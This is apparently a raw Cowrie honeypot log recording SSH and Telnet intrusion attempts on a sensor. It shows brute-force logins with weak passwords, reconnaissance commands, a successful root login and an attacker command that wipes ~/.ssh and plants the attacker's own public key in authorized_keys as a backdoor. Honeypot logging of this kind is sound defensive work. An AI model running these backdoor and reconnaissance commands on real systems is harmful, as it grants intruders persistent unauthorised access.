{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a","size":0,"shasum":"a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:50:13.953669Z","src_ip":"212.227.235.229","session":"2bf373e5e604"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:50:14.839477Z","src_ip":"212.227.235.229","session":"2bf373e5e604"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'","message":"CMD: cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'","sensor":"my-vps","timestamp":"2025-08-28T13:50:14.840207Z","src_ip":"212.227.235.229","session":"2bf373e5e604"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe","size":35,"shasum":"95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:50:15.050788Z","src_ip":"212.227.235.229","session":"2bf373e5e604"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:50:15.491404Z","src_ip":"212.227.235.229","session":"2bf373e5e604"}
{"eventid":"cowrie.command.input","input":"free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'","message":"CMD: free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'","sensor":"my-vps","timestamp":"2025-08-28T13:50:15.492213Z","src_ip":"212.227.235.229","session":"2bf373e5e604"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c","size":29,"shasum":"ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:50:15.703105Z","src_ip":"212.227.235.229","session":"2bf373e5e604"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:50:16.179695Z","src_ip":"212.227.235.229","session":"2bf373e5e604"}
{"eventid":"cowrie.command.input","input":"ls -lh $(which ls)","message":"CMD: ls -lh $(which ls)","sensor":"my-vps","timestamp":"2025-08-28T13:50:16.180408Z","src_ip":"212.227.235.229","session":"2bf373e5e604"}
{"eventid":"cowrie.command.input","input":"which ls","message":"CMD: which ls","sensor":"my-vps","timestamp":"2025-08-28T13:50:16.181054Z","src_ip":"212.227.235.229","session":"2bf373e5e604"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0","size":55,"shasum":"a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:50:16.392423Z","src_ip":"212.227.235.229","session":"2bf373e5e604"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:50:16.874912Z","src_ip":"212.227.235.229","session":"2bf373e5e604"}
{"eventid":"cowrie.command.input","input":"crontab -l","message":"CMD: crontab -l","sensor":"my-vps","timestamp":"2025-08-28T13:50:16.875649Z","src_ip":"212.227.235.229","session":"2bf373e5e604"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8","size":20,"shasum":"f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:50:17.086313Z","src_ip":"212.227.235.229","session":"2bf373e5e604"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:50:17.564084Z","src_ip":"212.227.235.229","session":"2bf373e5e604"}
{"eventid":"cowrie.command.input","input":"w","message":"CMD: w","sensor":"my-vps","timestamp":"2025-08-28T13:50:17.564821Z","src_ip":"212.227.235.229","session":"2bf373e5e604"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326","size":205,"shasum":"50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:50:17.775125Z","src_ip":"212.227.235.229","session":"2bf373e5e604"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:50:18.252981Z","src_ip":"212.227.235.229","session":"2bf373e5e604"}
{"eventid":"cowrie.command.input","input":"uname -m","message":"CMD: uname -m","sensor":"my-vps","timestamp":"2025-08-28T13:50:18.253688Z","src_ip":"212.227.235.229","session":"2bf373e5e604"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d","size":7,"shasum":"ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:50:18.463826Z","src_ip":"212.227.235.229","session":"2bf373e5e604"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:50:19.328546Z","src_ip":"212.227.235.229","session":"2bf373e5e604"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep model | grep name | wc -l","message":"CMD: cat /proc/cpuinfo | grep model | grep name | wc -l","sensor":"my-vps","timestamp":"2025-08-28T13:50:19.329298Z","src_ip":"212.227.235.229","session":"2bf373e5e604"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420","size":2,"shasum":"64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:50:19.539691Z","src_ip":"212.227.235.229","session":"2bf373e5e604"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:50:19.977371Z","src_ip":"212.227.235.229","session":"2bf373e5e604"}
{"eventid":"cowrie.command.input","input":"top","message":"CMD: top","sensor":"my-vps","timestamp":"2025-08-28T13:50:19.978144Z","src_ip":"212.227.235.229","session":"2bf373e5e604"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39","size":44,"shasum":"28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:50:20.188410Z","src_ip":"212.227.235.229","session":"2bf373e5e604"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:50:20.667346Z","src_ip":"212.227.235.229","session":"2bf373e5e604"}
{"eventid":"cowrie.command.input","input":"uname","message":"CMD: uname","sensor":"my-vps","timestamp":"2025-08-28T13:50:20.668114Z","src_ip":"212.227.235.229","session":"2bf373e5e604"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711","size":6,"shasum":"5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:50:20.877902Z","src_ip":"212.227.235.229","session":"2bf373e5e604"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:50:21.357242Z","src_ip":"212.227.235.229","session":"2bf373e5e604"}
{"eventid":"cowrie.command.input","input":"uname -a","message":"CMD: uname -a","sensor":"my-vps","timestamp":"2025-08-28T13:50:21.357926Z","src_ip":"212.227.235.229","session":"2bf373e5e604"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","size":80,"shasum":"28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:50:21.567868Z","src_ip":"212.227.235.229","session":"2bf373e5e604"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:50:22.046060Z","src_ip":"212.227.235.229","session":"2bf373e5e604"}
{"eventid":"cowrie.command.input","input":"whoami","message":"CMD: whoami","sensor":"my-vps","timestamp":"2025-08-28T13:50:22.046766Z","src_ip":"212.227.235.229","session":"2bf373e5e604"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","size":5,"shasum":"f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:50:22.256511Z","src_ip":"212.227.235.229","session":"2bf373e5e604"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:50:23.121109Z","src_ip":"212.227.235.229","session":"2bf373e5e604"}
{"eventid":"cowrie.command.input","input":"lscpu | grep Model","message":"CMD: lscpu | grep Model","sensor":"my-vps","timestamp":"2025-08-28T13:50:23.121794Z","src_ip":"212.227.235.229","session":"2bf373e5e604"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851","size":26,"shasum":"afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:50:23.331893Z","src_ip":"212.227.235.229","session":"2bf373e5e604"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:50:23.767960Z","src_ip":"212.227.235.229","session":"2bf373e5e604"}
{"eventid":"cowrie.command.input","input":"df -h | head -n 2 | awk 'FNR == 2 {print $2;}'","message":"CMD: df -h | head -n 2 | awk 'FNR == 2 {print $2;}'","sensor":"my-vps","timestamp":"2025-08-28T13:50:23.768763Z","src_ip":"212.227.235.229","session":"2bf373e5e604"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e","size":10,"shasum":"09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:50:23.979373Z","src_ip":"212.227.235.229","session":"2bf373e5e604"}
{"eventid":"cowrie.session.closed","duration":"26.2","message":"Connection lost after 26.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:50:23.980631Z","src_ip":"212.227.235.229","session":"2bf373e5e604"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43704,"dst_ip":"1.2.3.4","dst_port":22,"session":"b771de9785ef","protocol":"ssh","message":"New connection: 212.227.125.160:43704 (1.2.3.4:22) [session: b771de9785ef]","sensor":"my-vps","timestamp":"2025-08-28T13:50:31.176185Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T13:50:31.176941Z","src_ip":"212.227.125.160","session":"b771de9785ef"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T13:50:31.338565Z","src_ip":"212.227.125.160","session":"b771de9785ef"}
{"eventid":"cowrie.login.failed","username":"deploy","password":"123456789","message":"login attempt [deploy/123456789] failed","sensor":"my-vps","timestamp":"2025-08-28T13:50:31.825685Z","src_ip":"212.227.125.160","session":"b771de9785ef"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:50:33.061939Z","src_ip":"212.227.125.160","session":"b771de9785ef"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43024,"dst_ip":"1.2.3.4","dst_port":22,"session":"a286b3d39da9","protocol":"ssh","message":"New connection: 212.227.125.160:43024 (1.2.3.4:22) [session: a286b3d39da9]","sensor":"my-vps","timestamp":"2025-08-28T13:51:06.165154Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T13:51:06.165877Z","src_ip":"212.227.125.160","session":"a286b3d39da9"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T13:51:06.327406Z","src_ip":"212.227.125.160","session":"a286b3d39da9"}
{"eventid":"cowrie.login.failed","username":"deploy","password":"12345","message":"login attempt [deploy/12345] failed","sensor":"my-vps","timestamp":"2025-08-28T13:51:06.814702Z","src_ip":"212.227.125.160","session":"a286b3d39da9"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:51:07.978590Z","src_ip":"212.227.125.160","session":"a286b3d39da9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50021,"dst_ip":"1.2.3.4","dst_port":23,"session":"38c9e886336e","protocol":"telnet","message":"New connection: 212.227.235.229:50021 (1.2.3.4:23) [session: 38c9e886336e]","sensor":"my-vps","timestamp":"2025-08-28T13:51:12.569602Z"}
{"eventid":"cowrie.session.closed","duration":12.85275149345398,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:51:25.422278Z","src_ip":"212.227.235.229","session":"38c9e886336e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45164,"dst_ip":"1.2.3.4","dst_port":22,"session":"c7ed4570993b","protocol":"ssh","message":"New connection: 212.227.125.160:45164 (1.2.3.4:22) [session: c7ed4570993b]","sensor":"my-vps","timestamp":"2025-08-28T13:51:40.858791Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T13:51:40.859809Z","src_ip":"212.227.125.160","session":"c7ed4570993b"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T13:51:41.034521Z","src_ip":"212.227.125.160","session":"c7ed4570993b"}
{"eventid":"cowrie.login.failed","username":"deploy","password":"12345678","message":"login attempt [deploy/12345678] failed","sensor":"my-vps","timestamp":"2025-08-28T13:51:41.561392Z","src_ip":"212.227.125.160","session":"c7ed4570993b"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:51:42.738519Z","src_ip":"212.227.125.160","session":"c7ed4570993b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36562,"dst_ip":"1.2.3.4","dst_port":22,"session":"1213cfae6c07","protocol":"ssh","message":"New connection: 212.227.235.229:36562 (1.2.3.4:22) [session: 1213cfae6c07]","sensor":"my-vps","timestamp":"2025-08-28T13:51:51.514007Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T13:51:51.515406Z","src_ip":"212.227.235.229","session":"1213cfae6c07"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T13:51:51.749091Z","src_ip":"212.227.235.229","session":"1213cfae6c07"}
{"eventid":"cowrie.login.success","username":"root","password":"qqqq","message":"login attempt [root/qqqq] succeeded","sensor":"my-vps","timestamp":"2025-08-28T13:51:52.622578Z","src_ip":"212.227.235.229","session":"1213cfae6c07"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:51:53.059155Z","src_ip":"212.227.235.229","session":"1213cfae6c07"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T13:51:53.059864Z","src_ip":"212.227.235.229","session":"1213cfae6c07"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T13:51:53.060964Z","src_ip":"212.227.235.229","session":"1213cfae6c07"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:51:53.270235Z","src_ip":"212.227.235.229","session":"1213cfae6c07"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:51:53.744359Z","src_ip":"212.227.235.229","session":"1213cfae6c07"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T13:51:53.745085Z","src_ip":"212.227.235.229","session":"1213cfae6c07"}
